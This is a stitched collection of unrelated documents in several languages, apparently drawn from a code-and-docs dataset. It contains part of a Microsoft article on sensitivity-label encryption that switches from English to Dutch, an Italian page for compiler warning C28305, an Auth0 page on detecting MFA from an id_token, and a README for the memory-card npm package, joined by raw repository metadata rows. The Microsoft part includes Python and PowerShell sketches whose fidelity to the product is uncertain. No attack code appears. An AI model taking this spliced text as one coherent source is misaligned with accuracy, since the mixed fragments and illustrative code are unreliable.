For example, the person who applies Do Not Forward to an email can relabel the thread to replace the encryption or remove it, because they're the Rights Management issuer for the email. But with the exception of super users, recipients of this email can't relabel it because they don't have the required usage rights.
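The decision logic in the table and the rights check above can be sketched as a small Python helper. This is an illustrative model only, not an API of any Microsoft service; the string values are invented for readability:

```python
def resulting_encryption(existing, label_option, user_can_relabel=True):
    """Model what happens to existing encryption when a label is applied.

    existing: "user-defined", "protection-template", or "admin-defined-label"
    label_option: "not-selected", "configured", or "remove"
    user_can_relabel: True if the user has the Export or Full Control usage
        right, or is Rights Management issuer/owner or a super user.
    """
    # Applying new label encryption or removing existing encryption
    # requires a qualifying usage right or role.
    changes_encryption = (
        label_option in ("configured", "remove")
        or existing == "admin-defined-label"
    )
    if changes_encryption and not user_can_relabel:
        return "label not applied; original encryption preserved"

    if label_option == "configured":
        return "new label encryption applied"
    if label_option == "remove":
        return "original encryption removed"
    # label_option == "not-selected": only admin-defined label
    # encryption is replaced (here: removed); the rest is preserved.
    if existing == "admin-defined-label":
        return "original encryption removed"
    return "original encryption preserved"
```

Each branch corresponds to one cell of the table, with the usage-right gate applied first.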
#### <a name="email-attachments-for-encrypted-email-messages"></a>Email attachments for encrypted email messages

When an email message is encrypted by any method, any unencrypted Office documents that are attached to the email automatically inherit the same encryption settings.

Documents that are already encrypted and then added as attachments always preserve their original encryption.
## <a name="configure-encryption-settings"></a>Configure encryption settings

When you select **Configure encryption settings** on the **Encryption** page when you're creating or editing a sensitivity label, choose one of the following options:

- **Assign permissions now**, so that you determine exactly which users get which permissions to content that has the label applied. For more information, see the next section, [Assign permissions now](#assign-permissions-now).
- **Let users assign permissions** when they apply the label to content. With this option, you can allow people in your organization some flexibility that they might need to collaborate and get their work done. For more information, see the [Let users assign permissions](#let-users-assign-permissions) section on this page.

For example, if you have a sensitivity label named **Highly Confidential** that's applied to your most sensitive content, you might want to decide now who gets what type of permissions to that content.

But if you have a sensitivity label named **Business Contracts**, and your organization's workflow requires that your people collaborate on this content with different people on an ad hoc basis, you might want to let your users decide who gets permissions when they assign the label. This flexibility both helps your users' productivity and reduces the requests for your admins to update or create new sensitivity labels to address specific scenarios.

Choosing whether to assign permissions now or let users assign permissions:

## <a name="assign-permissions-now"></a>Assign permissions now

Use the following options to control who can access email or documents to which this label is applied. You can:

- **Allow access to labeled content to expire**, either on a specific date or after a specific number of days after the label is applied. After this time, users won't be able to open the labeled item. If you specify a date, it's effective midnight on that date in your current time zone. (Note that some email clients don't enforce expiration and show emails past their expiration date, as a result of how their caching works.)
- **Allow offline access** never, always, or for a specific number of days after the label is applied. If you restrict offline access to never or to a number of days, when that threshold is reached, users must be reauthenticated and their access is logged. For more information, see the next section on the Rights Management use license.

Settings for access control for encrypted content:

### <a name="rights-management-use-license-for-offline-access"></a>Rights Management use license for offline access

When a user opens a document or email that's been protected by encryption from the Azure Rights Management service, an Azure Rights Management use license for that content is granted to the user. This use license is a certificate that contains the user's usage rights for the document or email, and the encryption key that was used to encrypt the content. The use license also contains an expiration date if one has been set, and how long the use license is valid.

If no use license expiration date has been set, the default use license validity period for a tenant is 30 days. For the duration of the use license, the user isn't reauthenticated or reauthorized for the content. This lets the user continue to open the protected document or email without an internet connection during that period. When the use license validity period expires, the next time the user opens the protected document or email, the user must be reauthenticated and reauthorized.

In addition to reauthentication, the encryption settings and group membership for the user are reevaluated. This means that users could experience different access results for the same document or email if the encryption settings or their group membership changed since they last accessed the content.

To learn how to change the 30-day default, see [Rights Management use license](/azure/information-protection/configure-usage-rights#rights-management-use-license).
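As a rough illustration of how the use license governs offline access, the following sketch models the validity window. The 30-day tenant default comes from this article; the function itself is hypothetical:

```python
from datetime import date, timedelta

def needs_reauthentication(license_issued: date, today: date,
                           validity_days: int = 30) -> bool:
    """Return True when the use license has expired, meaning the user
    must be reauthenticated and reauthorized (and the encryption
    settings and group membership reevaluated) before the protected
    content opens again. While the license is valid, the content can
    be opened without an internet connection."""
    expires = license_issued + timedelta(days=validity_days)
    return today >= expires
```

For example, with the default period, a license issued on January 1 allows offline access until the end of the month; opening the content on February 1 triggers reauthentication.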
### <a name="assign-permissions-to-specific-users-or-groups"></a>Assign permissions to specific users or groups

You can grant permissions to specific people so that only they can interact with the labeled content:

1. First, add users or groups that will be assigned permissions to the labeled content.
2. Then, choose which permissions those users should have for the labeled content.

Assigning permissions:

#### <a name="add-users-or-groups"></a>Add users or groups

When you assign permissions, you can choose from the following options:

- Everyone in your organization (all tenant members). This setting excludes guest accounts.
- Any authenticated user. Make sure you understand the [requirements and limitations](#requirements-and-limitations-for-add-any-authenticated-users) of this setting before selecting it.
- Any specific user or email-enabled security group, distribution group, or Microsoft 365 group ([formerly an Office 365 group](https://techcommunity.microsoft.com/t5/microsoft-365-blog/office-365-groups-will-become-microsoft-365-groups/ba-p/1303601)) in Azure AD. The Microsoft 365 group can have static or [dynamic membership](/azure/active-directory/users-groups-roles/groups-create-rule). Note that you can't use a [dynamic distribution group from Exchange](/Exchange/recipients/dynamic-distribution-groups/dynamic-distribution-groups) because this group type isn't synchronized to Azure AD, and you can't use a security group that isn't email-enabled.
- Any email address or domain. Use this option to specify all users in another organization that uses Azure AD, by entering any domain name from that organization. You can also use this option for social providers, by entering their domain name, such as **gmail.com**, **hotmail.com**, or **outlook.com**.

> [!NOTE]
> If you specify a domain from an organization that uses Azure AD, you can't restrict access to that specific domain. Instead, all verified domains in Azure AD are automatically included for the tenant that owns the domain name you specify.

When you choose all users and groups in your organization, or browse the directory, the users or groups must have an email address.

As a best practice, use groups rather than users. This strategy keeps your configuration simpler.
##### <a name="requirements-and-limitations-for-add-any-authenticated-users"></a>Requirements and limitations for Add any authenticated users

This setting doesn't restrict who can access the content that the label encrypts. The content is still encrypted, and you still have options to restrict how the content can be used (permissions) and accessed (expiry and offline access). However, the application opening the encrypted content must be able to support the authentication being used. For this reason, federated social providers such as Google, and onetime passcode authentication, work for email only, and only when you use Exchange Online. Microsoft accounts can be used with Office 365 apps and the [Azure Information Protection viewer](https://portal.azurerms.com/#/download).

> [!NOTE]
> You can use this setting with [SharePoint and OneDrive integration with Azure AD B2B](/sharepoint/sharepoint-azureb2b-integration-preview) when sensitivity labels are [enabled for Office files in SharePoint and OneDrive](sensitivity-labels-sharepoint-onedrive-files.md).

Some typical scenarios for the any authenticated users setting:

- You don't mind who views the content, but you want to restrict how it's used. For example, you don't want the content to be edited, copied, or printed.
- You don't need to restrict who accesses the content, but you want to be able to confirm who opens it.
- You have a requirement that the content must be encrypted at rest and in transit, but it doesn't need access controls.
#### <a name="choose-permissions"></a>Choose permissions

When you choose which permissions to allow for those users or groups, you can select either:

- A [predefined permissions level](/azure/information-protection/configure-usage-rights#rights-included-in-permissions-levels) with a preset group of rights, such as Co-Author or Reviewer.
- Custom permissions, where you choose one or more usage rights.

For more information to help you select the appropriate permissions, see [Usage rights and descriptions](/azure/information-protection/configure-usage-rights#usage-rights-and-descriptions).

Note that the same label can grant different permissions to different users. For example, a single label can assign some users as Reviewer and a different user as Co-Author, as shown in the following screenshot.

To do this, add users or groups, assign them permissions, and save those settings. Then repeat these steps, each time adding users and assigning them permissions, and saving the settings. You can repeat this configuration as often as needed, to define different permissions for different users.

#### <a name="rights-management-issuer-user-applying-the-sensitivity-label-always-has-full-control"></a>Rights Management issuer (user applying the sensitivity label) always has Full Control

Encryption for a sensitivity label uses the Azure Rights Management service from Azure Information Protection. When a user applies a sensitivity label to protect a document or email by using encryption, that user becomes the Rights Management issuer for that content.

The Rights Management issuer is always granted Full Control permissions for the document or email, and in addition:

- If the encryption settings include an expiration date, the Rights Management issuer can still open and edit the document or email after that date.
- The Rights Management issuer can always access the document or email offline.
- The Rights Management issuer can still open a document after it's been revoked.

For more information, see [Rights Management issuer and Rights Management owner](/azure/information-protection/configure-usage-rights#rights-management-issuer-and-rights-management-owner).
### <a name="double-key-encryption"></a>Double Key Encryption

> [!NOTE]
> This feature is currently supported only by the Azure Information Protection unified labeling client.

Select this option only after you've configured the Double Key Encryption service and you need to use this double key encryption for files that will have this label applied.

For more information, prerequisites, and configuration instructions, see [Double Key Encryption (DKE)](double-key-encryption.md).
## <a name="let-users-assign-permissions"></a>Let users assign permissions

> [!IMPORTANT]
> Not all labeling clients support all options that let users assign their own permissions. Use this section for more information.

You can use the following options to let users assign permissions when they manually apply a sensitivity label to content:

- In Outlook, a user can select restrictions equivalent to the [Do Not Forward](/azure/information-protection/configure-usage-rights#do-not-forward-option-for-emails) or [Encrypt-Only](/azure/information-protection/configure-usage-rights#encrypt-only-option-for-emails) option for their chosen recipients.

  The Do Not Forward option is supported by all email clients that support sensitivity labels. However, applying the **Encrypt-Only** option with a sensitivity label is a more recent release that's supported only by built-in labeling, and not by the Azure Information Protection unified labeling client. For email clients that don't support this capability, the label isn't visible.

  To check the minimum versions of Outlook apps that use built-in labeling to support the Encrypt-Only option with a sensitivity label, use the [capabilities table for Outlook](sensitivity-labels-office-apps.md#sensitivity-label-capabilities-in-outlook) and the row **Let users assign permissions: - Encrypt-Only**.

- In Word, PowerPoint, and Excel, a user is prompted to select their own permissions for specific users, groups, or organizations.

  This option is supported by the Azure Information Protection unified labeling client and by some apps that use built-in labeling. For apps that don't support this capability, the label either isn't visible to users, or the label is visible for consistency but can't be applied, with an explaining message to users.

  To check which apps that use built-in labeling support this option, use the [capabilities table for Word, Excel, and PowerPoint](sensitivity-labels-office-apps.md#sensitivity-label-capabilities-in-word-excel-and-powerpoint) and the row **Let users assign permissions: - Prompt users**.

When the options are supported, use the following table to identify when users see the sensitivity label:
|Setting |Label visible in Outlook|Label visible in Word, Excel, PowerPoint|
|:-----|:-----|:-----|
|**In Outlook, enforce restrictions with the Do Not Forward or Encrypt-Only option**|Yes |No |
|**In Word, PowerPoint, and Excel, prompt users to specify permissions**|No |Yes|

So when both settings are selected, the label is visible in both Outlook and in Word, Excel, and PowerPoint.

A sensitivity label that lets users assign permissions must be applied to content by users manually. It can't be applied automatically or used as a recommended label.
Configuring the user-assigned permissions:

### <a name="outlook-restrictions"></a>Outlook restrictions

In Outlook, when a user applies a sensitivity label that lets them assign permissions to a message, they can choose the **Do Not Forward** option or **Encrypt-Only**. The user sees the label name and description at the top of the message, which indicates the content is being protected. Unlike Word, PowerPoint, and Excel (see the [next section](#word-powerpoint-and-excel-permissions)), users aren't prompted to select specific permissions.

When either of these options is applied to an email, the email is encrypted and recipients must be authenticated. The recipients then automatically have restricted usage rights:

- **Do Not Forward**: Recipients can't forward the email, print it, or copy from it. For example, in the Outlook client, the Forward button isn't available, the Save As and Print menu options aren't available, and you can't add or change recipients in the To, Cc, or Bcc boxes.

  For more information about how this option works, see [Do Not Forward option for emails](/azure/information-protection/configure-usage-rights#do-not-forward-option-for-emails).

- **Encrypt-Only**: Recipients have all usage rights except Save As, Export, and Full Control. This combination of usage rights means that the recipients have no restrictions, except that they can't remove the protection. For example, a recipient can copy from the email, print it, and forward it.

  For more information about how this option works, see [Encrypt-Only option for emails](/azure/information-protection/configure-usage-rights#encrypt-only-option-for-emails).

Unencrypted Office documents that are attached to the email automatically inherit the same restrictions. For Do Not Forward, the usage rights applied to these documents are Edit Content, Edit; Save; View, Open, Read; and Allow Macros. If the user wants different usage rights for an attachment, or the attachment isn't an Office document that supports this inherited protection, the user needs to encrypt the file before attaching it to the email.
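To make the difference between the two Outlook options concrete, here's a small Python sketch of the recipient usage rights described above. The right names mirror this article's wording in simplified form; this is an illustrative model, not an actual rights API:

```python
# Simplified subset of the usage rights the Rights Management
# service can grant to email recipients.
ALL_RIGHTS = {
    "View", "Reply", "Edit", "Copy", "Print",
    "Forward", "Save As", "Export", "Full Control",
}

def recipient_rights(option: str) -> set:
    """Return the usage rights recipients get for an encrypted email."""
    if option == "Do Not Forward":
        # Recipients can't forward, print, or copy the email,
        # or save it outside their mailbox.
        return ALL_RIGHTS - {"Forward", "Print", "Copy",
                             "Save As", "Export", "Full Control"}
    if option == "Encrypt-Only":
        # Everything except the rights that could remove the protection.
        return ALL_RIGHTS - {"Save As", "Export", "Full Control"}
    raise ValueError(f"unknown option: {option}")
```

Comparing the two sets shows why Encrypt-Only recipients can still copy, print, and forward while Do Not Forward recipients can't; neither option lets recipients remove the protection.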
### <a name="word-powerpoint-and-excel-permissions"></a>Word, PowerPoint, and Excel permissions

In Word, PowerPoint, and Excel, when a user applies a sensitivity label that lets them assign permissions to a document, they're prompted to specify their choice of users and permissions when the encryption is applied.

For example, with the Azure Information Protection unified labeling client, users can:

- Select a permissions level, such as Viewer (which assigns the View Only permission) or Co-Author (which assigns the View, Edit, Copy, and Print permissions).
- Select users, groups, or organizations. This can include people both inside and outside your organization.
- Set an expiration date, after which the selected users can't access the content. For more information, see the earlier section, [Rights Management use license for offline access](#rights-management-use-license-for-offline-access).

For built-in labeling, users see the same dialog box if they select the following:

- Windows: **File** tab > **Info** > **Protect Document** > **Restrict Access** > **Restricted Access**
- macOS: **Review** tab > **Protection** > **Permissions** > **Restricted Access**
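The predefined permission levels mentioned above bundle individual usage rights. A minimal sketch of that mapping, based only on the Viewer and Co-Author examples in this article (other levels exist, and the exact right sets are simplified here):

```python
# Permission level -> usage rights it assigns (simplified;
# see the linked usage-rights documentation for the full sets).
PERMISSION_LEVELS = {
    "Viewer": {"View"},
    "Co-Author": {"View", "Edit", "Copy", "Print"},
}

def rights_for(level: str) -> set:
    """Look up the usage rights a predefined permission level grants."""
    try:
        return PERMISSION_LEVELS[level]
    except KeyError:
        raise ValueError(f"unknown permission level: {level}")
```

Choosing a level is therefore shorthand for assigning its whole set of rights at once, rather than picking custom rights one by one.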
## <a name="example-configurations-for-the-encryption-settings"></a>Example configurations for the encryption settings

For each example that follows, do the configuration from the **Encryption** page when **Configure encryption settings** is selected:

### <a name="example-1-label-that-applies-do-not-forward-to-send-an-encrypted-email-to-a-gmail-account"></a>Example 1: Label that applies Do Not Forward to send an encrypted email to a Gmail account

This label is displayed only in Outlook and Outlook on the web, and you must use Exchange Online. Instruct users to select this label when they need to send an encrypted email to people using a Gmail account (or any other email account outside your organization).

Your users type the Gmail email address in the **To** box. Then, they select the label, and the Do Not Forward option is automatically added to the email. The result is that recipients can't forward the email, print it, copy from it, or save it outside their mailbox by using the **Save As** option.

1. On the **Encryption** page, for **Assign permissions now or let users decide?** select **Let users assign permissions when they apply the label**.

2. Select the checkbox **In Outlook, enforce restrictions equivalent to the Do Not Forward option**.

3. If selected, clear the checkbox **In Word, PowerPoint, and Excel, prompt users to specify permissions**.

4. Select **Next** and complete the configuration.
### <a name="example-2-label-that-restricts-read-only-permission-to-all-users-in-another-organization"></a>Example 2: Label that restricts read-only permission to all users in another organization

This label is suitable for sharing very sensitive documents as read-only, and the documents always require an internet connection to view them.

This label isn't suitable for emails.

1. On the **Encryption** page, for **Assign permissions now or let users decide?** select **Assign permissions now**.

2. For **Allow offline access**, select **Never**.

3. Select **Assign permissions**.

4. On the **Assign permissions** pane, select **Add specific email addresses or domains**.

5. In the text box, enter the name of a domain from the other organization, for example, **fabrikam.com**. Then select **Add**.

6. Select **Choose permissions**.

7. On the **Choose permissions** pane, select the dropdown box, then **Viewer**, and then **Save**.

8. Back on the **Assign permissions** pane, select **Save**.

9. On the **Encryption** page, select **Next** and complete the configuration.
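Admins who script label creation can express a configuration like Example 2 with Security & Compliance PowerShell. The `New-Label` cmdlet and its `Encryption*` parameters exist, but the values below are illustrative only; verify the exact `EncryptionRightsDefinitions` syntax and the parameter for offline access against the current cmdlet reference before using this:

```powershell
# Requires a Security & Compliance PowerShell session (Connect-IPPSSession).
# Sketch of Example 2: read-only access for all users in fabrikam.com.
New-Label -Name "Read-Only-Fabrikam" `
    -DisplayName "Read-only for Fabrikam" `
    -Tooltip "Highly sensitive documents shared read-only with fabrikam.com" `
    -EncryptionEnabled $true `
    -EncryptionProtectionType Template `
    -EncryptionRightsDefinitions "fabrikam.com:VIEW"
# Offline access ("Never" in this example) is also controlled by an
# Encryption* parameter; check the New-Label reference for its exact
# name and the value that maps to "Never".
```

The portal steps above and a scripted configuration produce the same kind of label; scripting is mainly useful when you manage many labels or multiple tenants.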
### <a name="example-3-add-external-users-to-an-existing-label-that-encrypts-content"></a>Example 3: Add external users to an existing label that encrypts content

The new users that you add will be able to open documents and emails that have already been protected with this label. The permissions that you grant these users can be different from the permissions that the existing users have.

1. On the **Encryption** page, for **Assign permissions now or let users decide?** make sure **Assign permissions now** is selected.

2. Select **Assign permissions**.

3. On the **Assign permissions** pane, select **Add specific email addresses or domains**.

4. In the text box, enter the email address of the first user (or group) to add, and then select **Add**.

5. Select **Choose permissions**.

6. On the **Choose permissions** pane, select the permissions for this user (or group), and then select **Save**.

7. Back on the **Assign permissions** pane, repeat steps 3 through 6 for each user (or group) that you want to add to this label. Then select **Save**.

8. On the **Encryption** page, select **Next** and complete the configuration.
### <a name="example-4-label-that-encrypts-content-but-doesnt-restrict-who-can-access-it"></a>Voorbeeld 4: label waarmee inhoud wordt versleuteld, maar dat niet beperkt wie er toegang toe heeft
Deze configuratie heeft het voordeel dat u geen gebruikers, groepen of domeinen hoeft op te geven om een e-mailbericht of document te versleutelen. De inhoud blijft versleuteld en u kunt nog steeds gebruiksrechten, een vervaldatum en offlinetoegang opgeven.
Gebruik deze configuratie alleen als u niet hoeft te beperken wie het beveiligde document of de beveiligde e-mail kan openen. [Meer informatie over deze instelling](#requirements-and-limitations-for-add-any-authenticated-users)
1. Op de pagina **Versleuteling**: voor **Machtigingen nu toewijzen of gebruikers laten beslissen?** controleert u of **Machtigingen nu toewijzen** is geselecteerd.
2. Configureer instellingen voor **Gebruikerstoegang tot inhoud verloopt** en **Offlinetoegang toestaan**, zoals vereist.
3. Selecteer **Machtigingen toewijzen**.
4. In het deelvenster **Machtigingen toewijzen** selecteert u **Geverifieerde gebruikers toevoegen**.
Voor **Gebruikers en groepen** ziet u dat **Geverifieerde gebruikers** automatisch wordt toegevoegd. U kunt deze waarde niet wijzigen, alleen verwijderen. Hierdoor wordt de waarde **Geverifieerde gebruikers toevoegen** geannuleerd.
5. Selecteer **Machtigingen kiezen**.
6. In het deelvenster **Machtigingen kiezen** selecteert u de vervolgkeuzelijst, vervolgens de gewenste machtigingen en **Opslaan**.
7. Terug in het deelvenster **Machtigingen toewijzen** selecteert u **Opslaan**.
8. Op de pagina **Versleuteling** selecteert u **Volgende** en voltooit u de configuratie.
## <a name="considerations-for-encrypted-content"></a>Aandachtspunten voor versleutelde inhoud
Als u uw gevoeligste documenten en e-mailberichten versleutelt, krijgen alleen geautoriseerde personen toegang tot deze gegevens. Er zijn echter enkele aandachtspunten om rekening mee te houden:
- Als uw organisatie geen [vertrouwelijkheidslabels heeft ingeschakeld voor Office-bestanden in SharePoint en OneDrive](sensitivity-labels-sharepoint-onedrive-files.md):
- Zoeken, eDiscovery en Delve werken niet bij versleutelde bestanden.
- DLP-beleid werkt bij de metagegevens van deze versleutelde bestanden (inclusief informatie over retentielabels), maar niet bij de inhoud van deze bestanden (zoals creditcardnummers in bestanden).
- Gebruikers kunnen versleutelde bestanden niet openen via de webversie van Office. Wanneer vertrouwelijkheidslabels voor Office-bestanden in SharePoint en OneDrive zijn ingeschakeld, kunnen gebruikers de versleutelde bestanden openen in de webversie van Office. Hiervoor bestaan enkele [beperkingen](sensitivity-labels-sharepoint-onedrive-files.md#limitations), waaronder versleuteling die is toegepast met een on-premises sleutel (de zogenaamde 'hold your own key' of HYOK), [, dubbele sleutelcodering](#double-key-encryption) en versleuteling die onafhankelijk van een vertrouwelijkheidslabel is toegepast.
- Als u versleutelde documenten deelt met personen buiten uw organisatie, moet u mogelijk gastaccounts maken en beleid voor voorwaardelijke toegang wijzigen. Zie [Versleutelde documenten delen met externe gebruikers](sensitivity-labels-office-apps.md#support-for-external-users-and-labeled-content)voor meer informatie.
- Wanneer geautoriseerde gebruikers versleutelde documenten openen in hun Office-apps, zien ze de naam en beschrijving van het label in een gele berichtenbalk boven aan hun app. Wanneer de versleutelingsmachtigingen worden uitgebreid naar personen buiten uw organisatie, controleert u zorgvuldig de labelnamen en -beschrijvingen die zichtbaar zijn in deze berichtenbalk wanneer het document wordt geopend.
- Als meerdere gebruikers een versleuteld bestand tegelijkertijd willen bewerken, moeten ze allemaal gebruikmaken van de webversie van Office. Of voor Windows en Mac hebt u [cocreatie ingeschakeld voor bestanden die zijn versleuteld met vertrouwelijkheidslabels](sensitivity-labels-coauthoring.md) en gebruikers hebben de [vereiste minimumversies](sensitivity-labels-office-apps.md#sensitivity-label-capabilities-in-word-excel-and-powerpoint) van Word, Excel en PowerPoint. Als dit niet het geval is en het bestand al is geopend:
- In Office-apps (Windows, Mac, Android en iOS) zien gebruikers het bericht **Bestand in gebruik** met de naam van de persoon die het bestand heeft uitgecheckt. Ze kunnen vervolgens een alleen-lezenkopie bekijken of een kopie van het bestand opslaan en bewerken, en een melding ontvangen wanneer het bestand beschikbaar is.
- In de webversie van Office zien gebruikers een foutbericht dat ze het document niet kunnen bewerken met andere personen. Vervolgens kunnen ze **Openen selecteren in Leesweergave**.
- De functionaliteit [Automatisch opslaan](https://support.office.com/article/what-is-autosave-6d6bd723-ebfd-4e40-b5f6-ae6e8088f7a5) in Office-apps voor iOS en Android is uitgeschakeld voor versleutelde bestanden. Deze functionaliteit is ook uitgeschakeld voor versleutelde bestanden op Windows en Mac als u cocreatie niet hebt [ingeschakeld voor bestanden die zijn versleuteld met gevoeligheidslabels.](sensitivity-labels-coauthoring.md) Gebruikers zien een bericht dat voor het bestand beperkende machtigingen gelden die moeten worden verwijderd voordat Automatisch opslaan kan worden ingeschakeld.
- Het kan langer duren om versleutelde bestanden te openen in Office-apps (Windows, Mac, Android en iOS).
- Als een label waarmee versleuteling wordt toegepast, wordt toegevoegd door middel van een Office-app wanneer het document [in SharePoint wordt uitgecheckt](https://support.microsoft.com/office/check-out-check-in-or-discard-changes-to-files-in-a-library-7e2c12a9-a874-4393-9511-1378a700f6de) en de gebruiker vervolgens het uitgecheckte document negeert, blijft het document gelabeld en versleuteld.
- De volgende acties voor versleutelde bestanden worden niet ondersteund in Office-apps (Windows, Mac, Android en iOS). Gebruikers zien een foutbericht waarin wordt gemeld dat er iets is misgegaan. SharePoint kan echter als alternatief worden gebruikt:
- Kopieën van eerdere versies weergeven, herstellen en opslaan. Als alternatief kunnen gebruikers deze acties uitvoeren met behulp van de webversie van Office wanneer u [versiebeheer inschakelt en configureert voor een lijst of bibliotheek](https://support.office.com/article/enable-and-configure-versioning-for-a-list-or-library-1555d642-23ee-446a-990a-bcab618c7a37).
- Wijzig de naam of locatie van bestanden. Als alternatief kunnen gebruikers [de naam van een bestand, map of koppeling wijzigen in een documentbibliotheek](https://support.microsoft.com/office/rename-a-file-folder-or-link-in-a-document-library-bc493c1a-921f-4bc1-a7f6-985ce11bb185) in SharePoint.
Voor de beste samenwerkingservaring voor bestanden die zijn versleuteld met een vertrouwelijkheidslabel, wordt u aangeraden [vertrouwelijkheidslabels te gebruiken voor Office-bestanden in SharePoint en OneDrive](sensitivity-labels-sharepoint-onedrive-files.md) en de webversie van Office.
## <a name="next-steps"></a>Volgende stappen
Wilt u uw gelabelde en versleutelde documenten delen met personen buiten uw organisatie? Zie [Versleutelde documenten delen met externe gebruikers](sensitivity-labels-office-apps.md#sharing-encrypted-documents-with-external-users). | 99.068736 | 734 | 0.817368 | nld_Latn | 0.999891 |
edf2fe9d11a8969fe8aceb18babdaa73b6a74504 | 606 | md | Markdown | docs/code-quality/c28305.md | Mdlglobal-atlassian-net/cpp-docs.it-it | c8edd4e9238d24b047d2b59a86e2a540f371bd93 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/code-quality/c28305.md | Mdlglobal-atlassian-net/cpp-docs.it-it | c8edd4e9238d24b047d2b59a86e2a540f371bd93 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/code-quality/c28305.md | Mdlglobal-atlassian-net/cpp-docs.it-it | c8edd4e9238d24b047d2b59a86e2a540f371bd93 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2020-05-28T15:54:57.000Z | 2020-05-28T15:54:57.000Z | ---
title: C28305
ms.date: 11/04/2016
ms.topic: reference
f1_keywords:
- C28305
helpviewer_keywords:
- C28305
ms.assetid: c9495d3f-aa11-4695-ab8d-1d2194da9ce3
ms.openlocfilehash: af2dd900dbe69d96bc0ba1c4d984d2227dd44f29
ms.sourcegitcommit: 7bea0420d0e476287641edeb33a9d5689a98cb98
ms.translationtype: MT
ms.contentlocale: it-IT
ms.lasthandoff: 02/17/2020
ms.locfileid: "77421098"
---
# <a name="c28305"></a>C28305
> avviso C28305: è stato individuato un errore durante l'analisi del token \<>.
Questo avviso viene segnalato quando l'espressione contenente il token specificato non è in formato corretto.
| 27.545455 | 109 | 0.80363 | ita_Latn | 0.696365 |
edf3a7d533a39ed5281d335538ecde0c73da60d9 | 1,772 | md | Markdown | articles/multifactor-authentication/developer/mfa-from-id-token.md | lexaurin/docs | cd9f417e844fa1c4fd695945f30f06f2ad5685e6 | [
"MIT"
] | null | null | null | articles/multifactor-authentication/developer/mfa-from-id-token.md | lexaurin/docs | cd9f417e844fa1c4fd695945f30f06f2ad5685e6 | [
"MIT"
] | null | null | null | articles/multifactor-authentication/developer/mfa-from-id-token.md | lexaurin/docs | cd9f417e844fa1c4fd695945f30f06f2ad5685e6 | [
"MIT"
] | null | null | null | ---
description: Describes how to determine if a user has done multifactor authentication using their id_token and JWT
---
## Determine if a user has performed multifactor authentication
At times, it's necessary to determine if a particular user has had the additional security of multifactor authentication applied to their session. For instance, a user may be allowed access to sensitive data or allowed to reset their password only after further confirming their identity using MFA.
For a particular user session, developers can check the claims information available on the `id_token`, a [JSON Web Token](/jwt) provided by Auth0 that contains claims information relevant to the user's session. After [retrieving the id_token](/tokens/id_token), the value of the `amr` field can be evaluated to see if it contains `mfa` as a claim.
Note that `amr` can contain claims other than `mfa`, so its existence is not a sufficient test. Its contents must be examined for the `mfa` claim.
This example is built on top of the [JSON Web Token Sample Code](https://github.com/auth0/node-jsonwebtoken).
```js
const AUTH0_CLIENT_SECRET = '${account.clientSecret}';
const jwt = require('jsonwebtoken')
jwt.verify(id_token, AUTH0_CLIENT_SECRET, { algorithms: ['HS256'] }, function(err, decoded) {
if (err) {
console.log('invalid token');
return;
}
if (Array.isArray(decoded.amr) && decoded.amr.indexOf('mfa') >= 0) {
console.log('You used mfa');
return;
}
console.log('you are not using mfa');
});
```
## Further reading
* [Auth0 id_token](/tokens/id_token)
* [Overview of JSON Web Tokens](/jwt)
* [OpenID and amr](http://openid.net/specs/openid-connect-core-1_0.html)
* [JSON Web Token Example](https://github.com/auth0/node-jsonwebtoken)
| 45.435897 | 348 | 0.741535 | eng_Latn | 0.979658 |
edf4896128ce586b8ece251809b09dcf2ce4761f | 2,686 | md | Markdown | node_modules/_memory-card@0.6.21@memory-card/README.md | qyangge/wechat | 6cad983f9898394f7f0c3408c64da7982f165cb2 | [
"MIT"
] | null | null | null | node_modules/_memory-card@0.6.21@memory-card/README.md | qyangge/wechat | 6cad983f9898394f7f0c3408c64da7982f165cb2 | [
"MIT"
] | null | null | null | node_modules/_memory-card@0.6.21@memory-card/README.md | qyangge/wechat | 6cad983f9898394f7f0c3408c64da7982f165cb2 | [
"MIT"
] | null | null | null | # MEMORY CARD
[](https://badge.fury.io/js/memory-card)
[](https://www.npmjs.com/package/memory-card?activeTab=versions)
[](https://www.typescriptlang.org/)
[](https://travis-ci.com/huan/memory-card)
[](https://greenkeeper.io/)
Memory Card is an Easy to Use Key/Value Store, with Swagger API Backend & Serialization Support.
- It is design for using in distribution scenarios.
- It is NOT design for performance.

## API
```ts
/**
* ES6 Map like Async API
*/
export interface AsyncMap<K = any, V = any> {
size: Promise<number>
[Symbol.asyncIterator](): AsyncIterableIterator<[K, V]>
entries() : AsyncIterableIterator<[K, V]>
keys () : AsyncIterableIterator<K>
values () : AsyncIterableIterator<V>
get (key: K) : Promise<V | undefined>
set (key: K, value: V) : Promise<void>
has (key: K) : Promise<boolean>
delete (key: K) : Promise<void>
clear () : Promise<void>
}
export class MemoryCard implements AsyncMap { ... }
```
### 1. load()
### 2. save()
### 3. destroy()
### 4. multiplex()
## TODO
1. Swagger API Backend Support
1. toJSON Serializable with Metadata
## CHANGELOG
### v0.6 master (Aug 2018)
1. Support AWS S3 Cloud Storage
### v0.4 July 2018
1. Add `multiplex()` method to Multiplex MemoryStore to sub-MemoryStores.
### v0.2 June 2018
1. Unit Testing
1. NPM Pack Testing
1. DevOps to NPM with `@next` tag support for developing branch
### v0.0 May 31st, 2018
1. Promote `Profile` of Wechaty to SOLO NPM Module: `MemoryCard`
1. Update the API to ES6 `Map`-like, the difference is that MemoryCard is all **Async**.
## AUTHOR
Huan LI \<zixia@zixia.net\> (http://linkedin.com/in/zixia)
<a href="http://stackoverflow.com/users/1123955/zixia">
<img src="http://stackoverflow.com/users/flair/1123955.png" width="208" height="58" alt="profile for zixia at Stack Overflow, Q&A for professional and enthusiast programmers" title="profile for zixia at Stack Overflow, Q&A for professional and enthusiast programmers">
</a>
## COPYRIGHT & LICENSE
* Code & Docs © 2017 Huan LI \<zixia@zixia.net\>
* Code released under the Apache-2.0 License
* Docs released under Creative Commons
| 30.873563 | 278 | 0.678332 | kor_Hang | 0.35824 |
edf52e7a2160ed9b20c8439f2cfb1c3316ca263d | 236 | md | Markdown | content/courses/javascript-profesional.md | silnose/silnose.github.io | 50178bedff6f75fa28f7d7e160f66a712471b564 | [
"MIT"
] | null | null | null | content/courses/javascript-profesional.md | silnose/silnose.github.io | 50178bedff6f75fa28f7d7e160f66a712471b564 | [
"MIT"
] | null | null | null | content/courses/javascript-profesional.md | silnose/silnose.github.io | 50178bedff6f75fa28f7d7e160f66a712471b564 | [
"MIT"
